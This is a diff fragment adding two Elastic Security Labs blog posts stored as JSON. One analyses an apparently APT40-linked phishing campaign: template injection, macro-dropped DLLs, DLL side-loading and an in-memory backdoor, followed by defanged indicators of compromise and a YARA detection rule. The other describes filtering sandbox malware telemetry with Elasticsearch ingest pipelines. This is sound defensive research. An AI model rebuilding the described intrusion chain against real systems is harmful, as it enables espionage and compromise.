+ "document": "---\ntitle: \"A close look at the advanced techniques used in a Malaysian-focused APT campaign\"\nslug: \"advanced-techniques-used-in-malaysian-focused-apt-campaign\"\ndate: \"2022-06-22\"\ndescription: \"Our Elastic Security research team has focused on advanced techniques used in a Malaysian-focused APT campaign. Learn who’s behind it, how the attack works, observed MITRE attack® techniques, and indicators of compromise.\"\nauthor:\n - slug: samir-bousseaden\n - slug: daniel-stepanic\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-castle-tower.jpg\"\ncategory:\n - slug: campaigns\n---\n\nThe Elastic Security Intelligence & Analytics Team researches adversary innovations of many kinds, and has recently focused on an activity group that leveraged remote templates, VBA code evasion, and DLL side-loading techniques. Based on code similarity and shared tactics, techniques, and procedures (TTPs), the team assessed this activity to be possibly linked to a Chinese-based group known as APT40, or Leviathan. The group’s campaign appears to target Malaysian government officials with a lure regarding the 2020 Malaysian political crisis.\n\n## Anatomy of the attack\n\n\n\n\n\nTo initiate their advanced persistent threat (APT) campaign, the group likely delivered a Microsoft Word document as a phishing lure attachment. The image used in the lure (Figure 2) appears to be crafted from a broadcast announcement shared by a Malaysian blogger (Figure 1). The lure image includes the same broadcast time, but the date and speech topic are removed. 
Once this attachment is opened, a decoy document is presented while behind the scenes, taking the following actions:\n\n- The lure document downloads the remote template RemoteLoad.dotm\n- The remote template executes VBA macro code\n- The VBA macro code unpacks and executes two embedded base64-encoded DLLs (sl1.tmp and sl2.tmp) to c:\\users\\public\\\n\nThis technique is known as template injection, which you may recall from our [Playing defense against Gamaredon Group blog post](https://www.elastic.co/blog/playing-defense-against-gamaredon-group). This an effective approach used by adversaries to bypass perimeter controls such as email gateways.\n\n\n\nBoth embedded DLLs (sl1.tmp and sl2.tmp) are similar and export the same function names: RCT and RCP. The first DLL (sl1.tmp) is used to download a benign executable called LogiMailApp.exe and an associated library LogiMail.dll, and the second DLL (sl2.tmp) is used to execute LogiMailApp.exe, which automatically attempts to execute LogiMail.dll due to an inherent DLL search order vulnerability we’ll cover shortly.\n\n| | | | | |\n| --------------- | --------- | ------------ | -------------------------------- | ------------------------- |\n| File name | File type | Size (bytes) | MD5 | Compile time |\n| LogiMailApp.exe | Win32 EXE | 311656 | 850a163ce1f9cff0367854038d8cfa7e | 2012-09-26 22:13:13+00:00 |\n| LogiMail.dll | Win32 DLL | 105984 | b5a5dc78fb392fae927e9461888f354d | 2020-06-03 04:08:29+00:00 |\n| sl1.tmp | Win32 DLL | 3072 | ccbdda7217ba439dfb6bbc6c3bd594f8 | 2019-11-29 17:15:29+00:00 |\n| sl2.tmp | Win32 DLL | 3072 | dbfa006d64f39cde78b0efda1373309c | 2019-11-29 21:23:44+00:00 |\n\n_Table 1: Dropped files metadata_\n\n\n\nThis implementation stood out to our researchers due to a behavioral idiosyncrasy:\n\n- The Microsoft Office application winword.exe loads sl1.tmp and sl2.tmp DLLs uses the LoadLibraryA method, which is moderately rare\n- These DLLs run explicit commands or install a payload from a URL 
using the CallWindowProcA method, which appears to be exceptionally rare\n- Both DLLs are deleted after execution\n\n\n\n## Embedded DLLs\n\nThe embedded DLLs, sl1.tmp and sl2.tmp, have very limited functionality — exporting the RCP and RCT functions. The RCP function implements the WinExec method to execute commands where the RCT function uses the URLDownloadToFileA method to download a file from a specified URL.\n\n\n\n## DLL side-loading a backdoor\n\nLogiMailApp.exe, which is downloaded by sl1.tmp and executed by sl2.tmp, is vulnerable to a form of DLL search-order hijacking called side-loading, which automatically searches for and executes LogiMail.dll if found in the same directory. Forms of DLL search-order hijacking can be used with many third-party software applications. In this case, search-order hijacking was used to load a backdoor that exports the following notable functions:\n\n\n\n\n\n\n\nThe adversary-created binary LogiMail.dll exports the function DllGetClassObject that contains critical logic for the execution flow of this sample:\n\n1. Download an AES-encrypted second stage object to %TEMP%\\~liseces1.pcs\n2. Derive a 128-bit AES key and initialization vector from SHA256 of a hardcoded string\n3. Read and decrypt %TEMP%\\~liseces1.pcs in memory using the ReadFile and CryptDecrypt functions\n4. 
Delete %TEMP%\\~liseces1.pcs from disk\n\n\n\n\n\n\n\n## Second stage backdoor\n\nThe decrypted second stage backdoor is mapped into memory and then its original entry point (OEP) is called, thus bypassing successful detections based on file system scanning.\n\n\n\n\n\nBoth the payload staging server and the second stage infrastructure use dynamic DNS:\n\n\n\nThis payload supports the following capabilities:\n\n- Basic anti-debug checks\n- System and user discovery\n- Execution via command line\n- File discovery, upload, and download\n- Persistence via run registry\n- Encrypt C2 traffic using same AES key\n\n\n\n\n\n\n\n## Possible APT40/Leviathan connection\n\nEarlier in the year, the Malaysian Computer Emergency Response Team (MyCERT) issued an [advisory](https://www.mycert.org.my/portal/advisory?id=MA-774.022020) related to espionage activity targeting their country. The report listed different TTPs and included multiple samples and other technical indicators that align with a threat group known as APT40/Leviathan.\n\nAt a high level, this sample follows the continued trend of targeting Malaysian victims using specific TTPs such as remote templates, employing macros, using DLL side-loading techniques, and leveraging an in-memory implant with dynamic DNS for command and control. More specifically, the second stage implant from this lure shares unique strings and URL references and contains similar functionality that correlates with the previous reporting for APT40/Leviathan. 
With these similarities, our Intelligence & Analytics Team assesses with moderate confidence that this activity is linked to APT40/Leviathan.\n\nImplant String Similarities with MyCERT Sample:\n\n- /list_direction\n- /post_document\n- /post_login\n- Open Remote File %s Failed For: %s\n- Open Pipe Failed %s\n- Download Read Path Failed %s\n- %02X-%02X-%02X-%02X-%02X-%02X\n- Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- ntkd\n\n\n\n\n\n## Conclusion\n\nIn this post, we highlighted a recent sample that most likely represents the work of a highly organized adversary. Activity groups like this are significant for everyone to take notice of, if only because they represent a higher maturity level of post-exploit innovation. Their cutting edge TTPs today end up being everyone’s run of the mill tomorrow; it’s important to learn from these events.\n\nWe hope that by sharing some of these insights, we can help raise awareness and continue to focus on protecting the world's data from attack. 
To enable organizations further, we’ve added all the observed MITRE ATT&CK® techniques and indicators of compromise (IoCs) below.\n\n### MITRE ATT&CK® techniques\n\n- [T1193 - Spearphishing Attachment](https://attack.mitre.org/techniques/T1193/)\n- [T1221 - Template Injection](https://attack.mitre.org/techniques/T1221/)\n- [T1060 - Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1060/)\n- [T1073 - DLL Side-Loading](https://attack.mitre.org/techniques/T1073/)\n- [T1129 - Execution through Module Load](https://attack.mitre.org/techniques/T1129/)\n- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)\n- [T1107 - File Deletion](https://attack.mitre.org/techniques/T1107/)\n- [T1140 - Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)\n- [T1059 - Command-Line Interface](https://attack.mitre.org/techniques/T1059/)\n\n### Indicators of Compromise (IOCs)\n\n#### File names and paths\n\n```\nBubar Parlimen.zip\nBubar Parlimen.docx\nRemoteLoad.dotm\nC:\\Users\\Public\\sl1.tmp\nC:\\Users\\Public\\sl2.tmp\nC:\\Users\\*\\AppData\\Local\\Temp\\~liseces1.pcs\nC:\\Users\\*\\AppData\\Local\\Microsoft\\Office\\LogiMailApp.exe\nC:\\Users\\*\\AppData\\Local\\Microsoft\\Office\\LogiMail.dll\n```\n\n#### Registry keys\n\n```\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd\n```\n\n#### URLs\n\n```\nhxxps[:]//armybar[.]hopto[.]org/LogiMail.dll\nhxxps[:]//armybar[.]hopto[.]org/LogiMailApp[.]exe\nhxxps[:]//armybar[.]hopto[.]org/Encrypted\nhxxp[:]//tomema.myddns[.]me/postlogin\nhxxp[:]//tomema[.]myddns[.]me/list_direction\nhxxp[:]//tomema[.]myddns[.]me/post_document\n```\n\n#### IPs\n\n```\n104[.]248[.]148[.]156\n139[.]59[.]31[.]188\n```\n\n#### HTTPS certificate\n\n```\n74b5e317527c93539dbaaf84d6a61da92a56012a\n```\n\n#### 
Hashes\n\n```\n523cbdaf31ddc920e5b6c873f3ab42fb791fb4c9d1f4d9e6a7f174105d4f72a1\nab541df861c6045a17006969dac074a7d300c0a8edd0a5815c8b871b62ecdda7\n145daf50aefb7beec32556fd011e10c9eaa71e356649edfce4404409c1e8fa30\n93810c5fd9a287d85c182d2ad13e7d30f99df76e55bb40e5bc7a486d259810c8\n925f404b0207055f2a524d9825c48aa511199da95120ed7aafa52d3f7594b0c9\nfeca9ad5058bc8571d89c9d5a1eebce09e709cc82954f8dce1564e8cc6750a77\n06a4246be400ad0347e71b3c4ecd607edda59fbf873791d3772ce001f580c1d3\n77ef350639b767ce0a748f94f723a6a88609c67be485b9d8ff8401729b8003d2\n```\n\n### YARA\n\n```\nrule APT_APT40_Implant_June2020 {\n meta:\n version = \"1.0\"\n author = \"Elastic Security\"\n date_added = \"2020-06-19\"\n description = \"APT40 second stage implant\"\n strings:\n $a = \"/list_direction\" fullword wide\n $b = \"/post_document\" fullword wide\n $c = \"/postlogin\" fullword wide\n $d = \"Download Read Path Failed %s\" fullword ascii\n $e = \"Open Pipe Failed %s\" fullword ascii\n $f = \"Open Remote File %s Failed For: %s\" fullword ascii\n $g = \"Download Read Path Failed %s\" fullword ascii\n $h = \"\\\\cmd.exe\" fullword wide\n condition:\n all of them\n}\n```\n\n### References\n\n- [https://www.mycert.org.my/portal/advisory?id=MA-774.022020](https://www.mycert.org.my/portal/advisory?id=MA-774.022020)\n\n- [https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/](https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/)\n- [https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html](https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache](https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache)\n"
+ },
+ "title": "A close look at the advanced techniques used in a Malaysian-focused APT campaign",
+ "slug": "advanced-techniques-used-in-malaysian-focused-apt-campaign",
+ "date": "2022-06-22",
+ "description": "Our Elastic Security research team has focused on advanced techniques used in a Malaysian-focused APT campaign. Learn who’s behind it, how the attack works, observed MITRE attack® techniques, and indicators of compromise.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-castle-tower.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ]
+ },
+ "id": "security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md.json
new file mode 100644
index 00000000000..5a4f44a2655
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md.json
@@ -0,0 +1,23 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"An Elastic approach to large-scale dynamic malware analysis\"\nslug: \"an-elastic-approach-to-large-scale-dynamic-malware-analysis\"\ndate: \"2023-07-31\"\ndescription: \"This research reveals insights into some of the large-scale malware analysis performed by Elastic Security Labs, and complements research related to the Detonate framework.\"\nauthor:\n- slug: ruben-groenewoud\n- slug: remco-sprooten\nimage: \"blog-thumb-steel-engine.jpg\"\ncategory:\n---\n## Introduction\n\nIn previous publications, we have written about Detonate: how we built it and how we use it within Elastic for malware analysis. This publication delves deeper into using Detonate for dynamic large-scale malware analysis.\n\nAt a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities are enabled. For more information about Detonate, check out [Click, Click… Boom! Automating Protections Testing with Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate).\n\nA significant portion of the data generated during execution consists of benign and duplicate information. When conducting dynamic malware analysis on a large scale, managing the vast amount of low-value data is a considerable challenge. To address it, we took advantage of several Elastic ingest pipelines, which we leveraged to effectively filter out noise from our datasets. This application of ingest pipelines enabled us to conveniently analyze our large volumes of malware data and identify several malicious behaviors that we were already interested in.\n\nThis research examines the concept of ingest pipelines, exploring their different types and applications, and how to implement them. We will then walk through a comprehensive workflow incorporating these ingest pipelines. 
We will discuss our scripts and the methods that we created in order to automate the entire process. Finally, we will present our results and discuss how the workflow shared in this publication can be leveraged by others to obtain similar outcomes.\n\n### Overview\n\nIn order to accomplish our large-scale malware analysis goals, we required effective data management. An overview of the chained ingest pipelines and processors that we built is shown below:\n\n\n\nIn summary, we fingerprint known good binaries and store those fingerprints in an enrich index. We do the same thing when we detonate malware or an unknown binary, using a comparison of those fingerprints to quickly filter out low-value data.\n\n### Ingest pipelines\n\n[Ingest pipelines](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html) are a powerful feature that allows you to preprocess and transform data before indexing it into Elasticsearch. They provide a way to perform various actions on incoming documents, such as enriching the data, modifying fields, extracting information, or applying data normalization. Ingest pipelines can be customized to meet specific data processing requirements. Our objective was to create a pipeline that differentiates known benign documents from a dataset containing both benign and malicious records. We ingested large benign and malicious datasets into separate namespaces and built pipelines to normalize the data, calculate fingerprints, and add a specific label based on certain criteria. This label helps differentiate between known benign and unknown data.\n\n### Normalization\n\nNormalization is the process of organizing and transforming data into a consistent and standardized format. When dealing with lots of different data, normalization becomes important to ensure consistency, improve search and analysis capabilities, and enable efficient data processing.\n\nThe goal is to make sure documents with unique identifiers are no longer unique. 
For example, we remove the unique 6-character filename of the Elastic Agent in the \" `/opt/Elastic/Agent/data/`\" directory after installation. This ensures data from different Elastic Agents can be fully comparable, leading to more filtering opportunities in later pipeline phases.\n\nTo accomplish this, we leveraged the [gsub pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/gsub-processor.html). It allowed us to apply regex-based transformations to fields within the data pipeline. We performed pattern matching and substitution operations to normalize event data, such as removing special characters, converting text to lowercase, or replacing certain patterns with standardized values.\n\nBy analyzing our dataset, we discovered a set of candidates that would require normalization, and created a simple Python script to generate a list of gsub processors based on the matching value and the replacement value. The script that we leveraged can be found on [GitHub](https://github.com/elastic/labs-releases/tree/main/tools/malware_research). Using the output of the script, we can leverage dev tools to create a pipeline containing the generated gsub processors.\n\nPrior to utilizing the normalization pipeline, documents would contain random 6 character strings for every single Elastic agent. An example is displayed below.\n\n\n\nAfter ingesting and manipulating the documents through the normalization pipeline, the result looks like the following.\n\n\n\nWhen all documents are normalized, we can continue with the fingerprint calculation process.\n\n### Fingerprint calculation\n\nFingerprint calculations are commonly used to generate a unique identifier for documents based on their content. 
The [fingerprint ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/fingerprint-processor.html) provides a convenient way to generate such identifiers by computing a hash value based on the specified fields and options, allowing for efficient document deduplication and comparison. The pipeline offers various options, including algorithms (such as MD5 or SHA-1), target fields for storing the generated fingerprints, and the ability to include or exclude specific fields in the calculation.\n\nWe needed to calculate the fingerprints of documents ingested into Elasticsearch from several sources and integrations such as endpoint, [auditd manager](https://docs.elastic.co/integrations/auditd_manager), packetbeat, [file integrity monitoring](https://docs.elastic.co/integrations/fim) etc. To calculate the fingerprints, we first needed to specify which fields we wanted to calculate them for. Because different data sources use different fields, it was important to create separate processors for each data type. For our use case, we ended up creating a different fingerprint processor for the following set of event categories:\n\n\n\nBy specifying a condition we ensure that each processor only runs on its corresponding dataset.\n\n\n\nThe included fields to these processors are of the utmost importance, as they can indicate if a field is less static than expected or if an empty field could result in a non-functional pipeline. For example, when working with network data, it might initially make sense to include protocol, destination ip, destination port, source ip and source port. But this will lead to too much noise in the pipeline, as the socket that is opened on a system will be opened on an ephemeral source port, which will result in many unique fingerprints for otherwise identical network traffic. Some fields that may be subject to change relate to file sizes, version numbers, or specific text fields that are not being parsed. 
Normalization sometimes preserves fields that aren't useful for fingerprinting, and the more specific the fingerprint the less useful it tends to be. Fingerprinting by file hash illustrates this, while adding an empty space to the file causes a new hash to be calculated, this would break an existing hash-based fingerprint of the file.\n\nField selection is a tedious process but vital for good results. For a specific integration, like auditd manager, we can find the [exported fields](https://github.com/elastic/integrations/tree/main/packages/auditd_manager) on [GitHub](https://github.com/elastic/integrations/tree/main/packages) and pick the ones that seem useful for our purposes. An example of the processor that we used for `auditd\\_manager` can be found in the image below.\n\n\n\n### Enrichment process\n\nThe [enrich ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html) is used for enriching incoming documents with additional information from external data sources. It allows you to enrich your data by performing lookups against an index or data set, based on specific criteria. Common use cases for the enrich ingest pipeline include augmenting documents with data from reference datasets (such as geolocation or customer information) and enriching logs with contextual information (like threat intelligence labels).\n\nFor this project we leveraged enrich pipelines to add a unique identifier to the ingested document if it met certain criteria described within an enrich policy. To accomplish this, we first ingested a large and representative batch of benign data using a combination of normalization and fingerprint calculation pipelines. 
When the ingestion was completed, we set up several [enrich policies](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest-enriching-data.html) through the [execute enrich policy API](https://www.elastic.co/guide/en/elasticsearch/reference/current/execute-enrich-policy-api.html). The execution of these enrich policies will create a set of new .enrich-\\* system indices. The results stored within these indices will later be used by the pipelines that ingest mixed (benign and malicious) data.\n\nThis will make more sense with an example workflow. To leverage the enrich processor, we first need to create enrich policies. As we are dealing with different data sources - meaning network data looks very different from auditd manager data - we will have to create one enrich policy per data type. In our enrich policy we may use a query to specify which documents we want to include in our enrich index and which ones we want to exclude. An example enrich policy that should add all auditd manager data to the enrich index, other than the data matching three specific match phrases, is displayed below.\n\n\n\nWe are leveraging the “fingerprint” field, which is calculated in the fingerprint processor, as our match field. This will create an index filled with benign fingerprints to be used as the enriching index within the enrich pipeline.\n\nAfter creating this policy, we have to execute it so that it reads the matching index, reads the matching field, queries for inclusions and exclusions, and creates the new .enrich-\\* system index. We do this by executing a POST request to the \\_execute API.\n\n\n\nWe set wait_for_completion=false to make sure that the policy doesn’t time out, which might occur if the dataset is too large. 
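As a sketch, an enrich policy for such a dataset and its execution might look like the following. The index and policy names are hypothetical placeholders, and the excluded match phrases are elided rather than reproduced:

```json
PUT /_enrich/policy/benign_auditd_policy
{
  "match": {
    "indices": "benign-auditd-*",
    "match_field": "fingerprint",
    "enrich_fields": ["fingerprint"],
    "query": {
      "bool": {
        "must_not": [
          { "match_phrase": { "process.name": "..." } }
        ]
      }
    }
  }
}

POST /_enrich/policy/benign_auditd_policy/_execute?wait_for_completion=false
```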
When we navigate to index management and include hidden indices, we can see that the index is created successfully.\n\n\n\nWe now have a list of known benign fingerprints, which we will use within our enrich pipeline to filter our mixed dataset. Our enrich pipeline will once again use a condition to differentiate between data sources. An overview of our enrich processors is displayed below.\n\n\n\nFocusing on the auditd manager, we built an enrich processor using the condition field to check if the document's dataset is auditd_manager.auditd. If it matches, we reference the enrich policy we created for that dataset. Using the fingerprint field, we match and enrich incoming documents. If the fingerprint is known within the enrich indices we created, we add the \"enrich_label\" field with the fingerprint to the document. See the processor below.\n\n\n\nOnce a document originating from the auditd_manager.auditd dataset comes through, the enrich processor is executed, which in turn triggers a [script processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/script-processor.html). The script processor allows us to run inline or stored scripts on incoming documents. We leverage this functionality to read each document in the pipeline and check whether the “enrich_label” field was added. If so, we set a new boolean field called “known_benign” to true and remove the “enrich_label” and “enriched_fingerprint” fields. If the document does not contain the “enrich_label” field, we set “known\\_benign” to false. 
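A minimal sketch of this enrich-then-script pair could look like the following. The policy name is a hypothetical placeholder, and the script is simplified to the two fields discussed above:

```json
[
  {
    "enrich": {
      "if": "ctx?.event?.dataset == 'auditd_manager.auditd'",
      "policy_name": "benign_auditd_policy",
      "field": "fingerprint",
      "target_field": "enrich_label",
      "ignore_missing": true
    }
  },
  {
    "script": {
      "source": "if (ctx.containsKey('enrich_label')) { ctx['known_benign'] = true; ctx.remove('enrich_label'); } else { ctx['known_benign'] = false; }"
    }
  }
]
```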
This allows us to easily filter our mixed dataset in Kibana.\n\n\n\nWhen using the “test pipeline” feature by adding a document that contains the “enrich_label”, we can see that the “fingerprint” and the “known_benign” fields are set.\n\n\n\nFor documents that do not contain “enrich\\_label”, just the fingerprint is set.\n\nWorking with these enrich policies requires some setup, but once they are well structured, they can truly filter out a lot of noise. Because doing this manually is a lot of work, we created some simple Python scripts to partially automate this process. We will go into more detail shortly about how to automate the creation of these enrich policies, their execution, the creation of the enrich pipeline, and more.\n\n#### Ingest pipeline chaining\n\nThe [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html) provides a way to chain multiple ingest pipelines. By chaining pipelines, we create a sequence of operations that collectively shape the incoming data into the form that we want, facilitating our needs for data normalization, fingerprint calculation, and data enrichment.\n\nIn our work with Detonate, we ended up creating two ingest pipelines. The first processes benign data and consists of a normalization pipeline and a fingerprint calculation pipeline. The second processes malicious data and consists of a normalization, fingerprint calculation, and enrichment pipeline. An example of this would be the following:\n\n\n\nWith the pipelines in place, we need to ensure that they are actually being used when ingesting data. To accomplish this, we leverage component templates.\n\n### Component templates\n\n[Component templates](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-component-template.html) are reusable configurations that define the settings and mappings for specific types of Elasticsearch components. 
They provide a convenient way to define and manage consistent configurations across multiple components, simplifying the management and maintenance of resources.\n\nWhen you first start using any Fleet integrations, you will notice that many component templates are created by default. These are also tagged as \"managed\", meaning that you can't change the configuration.\n\n\n\nIn order to accommodate users who want to post-process events ingested via the Fleet-managed agent, all index templates call out to a final component template whose name ends in `@custom`.\n\n\n\nThe settings you put in these components will never be changed by updates. In our use case, we use these templates to add a mapping for the enrichment fields. Most of the data that is ingested via Fleet and its integrations will go through an ingest pipeline. These pipelines follow the same pattern in order to accommodate user customizations. Take for example the following ingest pipeline:\n\n\n\nWe can see that it is managed by Fleet and tied to a specific version (e.g. 8.8.0) of the integration. The pipeline ends by calling the `@custom` pipeline, ignoring it if it doesn't exist.\n\nWe want to add our enrichment data to the documents using the enrichment pipelines we described in the previous section. This can now simply be done by creating the `@custom` pipeline and having that call out to the enrichment pipeline.\n\n\n\n### Automating the process\n\nIn order to create the gsub processors, ingest pipelines, and enrich policies, we created three Python scripts, which we showcase in the next section. 
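Before moving on to the scripts, the chaining and the `@custom` hook described above can be sketched as follows. The sub-pipeline names are hypothetical, and the `logs-<dataset>@custom` naming follows the usual Fleet convention rather than a configuration taken from our environment:

```json
PUT _ingest/pipeline/process_local_events
{
  "processors": [
    { "pipeline": { "name": "normalization_pipeline" } },
    { "pipeline": { "name": "fingerprint_pipeline" } },
    { "pipeline": { "name": "enrichment_pipeline" } }
  ]
}

PUT _ingest/pipeline/logs-auditd_manager.auditd@custom
{
  "processors": [
    { "pipeline": { "name": "process_local_events" } }
  ]
}
```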
If you choose to integrate these scripts, remember that you will need to adjust them to match your own environment in order to make them work.\n\n#### Creating the gsub ingest pipelines\n\nIn order to create a gsub pipeline that replaces the given random paths with static ones, we used a Python [script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/gsub_pipeline_json_object.py) that takes several fields and patterns as input and prints out a JSON object which can be used by the pipeline creation API.\n\n#### Create Custom Pipelines\n\nAfter setting up the gsub pipeline, we leveraged [a second Python script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/custom_pipelines.py) that searches for all Fleet-managed configurations that call an `@custom` ingest pipeline. It will then create the appropriate pipeline, after which all the custom pipelines will point to the `process_local_events` pipeline.\n\n#### Generate Enrichment Processors\n\nFinally, we created a [third](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/enrich_policy_setup.py) Python script that handles the creation of enrichment processors in four steps.\n\n1. `The cleanup process`: While an enrich policy is in use by an ingest pipeline, it cannot be deleted. During testing and development we simply delete and recreate the ingest pipeline. This is of course not recommended for production environments. \n2. `Create enrich policies`: The script will create every individual policy.\n3. `Execute the policies`: This will start the process of creating the hidden enrichment system index. Note that the execution of the policy will take longer than the execution of the script, as the script does not wait for the completion of the command. Elastic will create the enrichment index in the background.\n4. 
`Re-create the ingest pipeline`: After the enrich policy has been updated, we can now re-create the ingest pipeline that uses the enrichments. \n\nAfter executing these three scripts, the whole setup is completed, and malicious data can be ingested into the correct namespace.\n\n### Results and limitations\n\nOur benign dataset includes 53,267,892 documents generated by executing trusted binaries on a variety of operating systems and collecting events from high-value data sources. Using this normalized benign dataset, we calculated the fingerprints and created the enrich policies per data type.\n\nWith this setup in place, we detonated 332 samples. After removing the Elastic agent metrics and endpoint alerts from the datasets, we ended up with a mixed dataset containing a total of 41,710,279 documents.\n\n\n\nAfter filtering for documents where “known\\_benign” is false, we end up with 1,321,949 documents. This is a decrease of 96.83% in document count.\n\n\n\nThe table below presents an overview of each data source and its corresponding number of documents before and after filtering on our “known\\_benign” field.\n\n\n\nWe can see that we managed to successfully filter most data sources by a decent percentage. Additionally, the numbers presented in the “after” column include malicious data that we do want to capture. For example, among the different malware samples, several included ransomware - which tends to create a lot of file events. Also, all of the HTTP traffic originated from malware samples trying to connect to their C2s. The auditd\\_manager and fim.event datasets include a lot of the syscalls and file changes performed by the samples.\n\nWhile building out this pipeline, we learned several lessons. First of all, as mentioned before, if you add one wrong field to the fingerprint calculation, the whole dataset might end up generating lots of noise. 
This can be seen by adding the source.port to the packetbeat fingerprint calculation, causing the endpoint.events.network and all network\\_traffic-\\* datasets to increase drastically.\n\nThe second lesson we learned: it is not only important to have a representative dataset, but it is also important to have a large dataset. These two go hand in hand, but we learned that having a small dataset, or a dataset whose behavior does not closely resemble the data that will be ingested later, will cause the pipelines to be less than half as effective.\n\nFinally, some data sources are better suited for this filtering approach than others. For example, when dealing with `system.syslog` and `system.auth` events, most of the fields within the document (except the message field) are always the same. As we cannot use this approach for unstructured data, such as plain-text fields, our filter would remove 99% of the events when looking only at the remaining fields.\n\n### Visualizing results\n\nKibana offers many great options to visualize large datasets. We chose to leverage the Lens functionality within Kibana to search through our malicious dataset. By filtering on `known\\_benign: false`, setting `count of fingerprint` as a metric, and sorting in ascending order, we can right away see different malware samples executing different tasks. 
Examples of file events are shown below.\n\n\n\nWithin this table, we can see:\n\n- Suspicious files being created in the `/dev/shm/` directory\n- “`HOW_TO_DECRYPT.txt`” file creations, indicating the creation of a ransom message\n- Files being changed to contain new random file extensions, indicating the ransomware encryption process\n\nWhen looking into file integrity monitoring events, we can also very easily distinguish benign events from malicious events by applying the same filter.\n\n\n\nRight away we notice the creation of a symlink for a `linux.service` and `bot.service`, and several run control symlinks to establish persistence on the system.\n\nLooking at network connections, we can see `connection\\_attempted` events from malicious samples to potential C2 servers on several uncommon ports.\n\n\n\nFinally, looking at auditd manager syscall events, we can see the malware opening files such as `cmdline` and `maps` and attempting to change the permissions of several files.\n\n\n\nOverall, in our opinion the data cleaning results are very promising and allow us to more efficiently conduct dynamic malware analysis on a large scale. The process can always be further optimized, so feel free to take advantage of our approach and fine tune it to your specific needs.\n\n## Beyond Dynamic Malware Analysis\n\nIn the previous sections we described our exact use case for leveraging fingerprint and enrich ingest pipelines. Other than malware analysis, there are many other fields that can reap the benefits of a workflow similar to the one outlined above. Several of these applications and use cases are described below:\n\n- Forensics and Security: Fingerprinting can be employed in digital forensics and security investigations to identify and link related artifacts or events. It helps in tracing the origin of data, analyzing patterns, and identifying potential threats or anomalies in log files, network traffic, or system events. 
Researchers over at Microsoft leveraged fuzzy hashing in [previous research](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/fuzzy-hashing-logs-to-find-malicious-activity/ba-p/3786669) to detect malicious web shell traffic. \n- Identity Resolution: Fingerprinting can be used to uniquely identify individuals or entities across different data sources. This is useful in applications like fraud detection, customer relationship management, and data integration, where matching and merging records based on unique identifiers is crucial.\n- Data Deduplication: Fingerprinting can help identify and eliminate duplicate records or documents within a dataset. By comparing fingerprints, you can efficiently detect and remove duplicate entries, ensuring data integrity and improving storage efficiency. Readers interested in data deduplication use cases might find great value in pre-built tools such as [Logslash](https://blog.foxio.io/introducing-logslash-and-the-end-of-traditional-logging-2c6708b6fc1c) to achieve this goal.\n- Content Management: Fingerprinting can be used in content management systems to detect duplicate or similar documents, images, or media files. It aids in content deduplication, similarity matching, and content-based searching by improving search accuracy and enhancing the overall user experience.\n- Media Identification: Fingerprinting techniques are widely used in media identification and recognition systems. By generating unique fingerprints for audio or video content, it becomes possible to identify copyrighted material, detect plagiarism, or enable content recommendation systems based on media similarity.\n\n## Conclusion\n\nThere are many different approaches to dynamic malware analysis. This blog post explored some of these options by leveraging the powerful capabilities offered by Elastic. 
Our aim was to both present a new method of dynamic malware analysis while at the same time broadening your understanding and knowledge of the built-in functionalities within Elastic.\n\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter @elasticseclabs and check out our research at [www.elastic.co/security-labs/](http://www.elastic.co/security-labs/).\n\n"
+ },
+ "title": "An Elastic approach to large-scale dynamic malware analysis",
+ "slug": "an-elastic-approach-to-large-scale-dynamic-malware-analysis",
+ "date": "2023-07-31",
+ "description": "This research reveals insights into some of the large-scale malware analysis performed by Elastic Security Labs, and complements research related to the Detonate framework.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ },
+ {
+ "slug": "remco-sprooten"
+ }
+ ],
+ "image": "blog-thumb-steel-engine.jpg",
+ "category": null
+ },
+ "id": "security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md",
+ "type": "security_labs_content"
+}
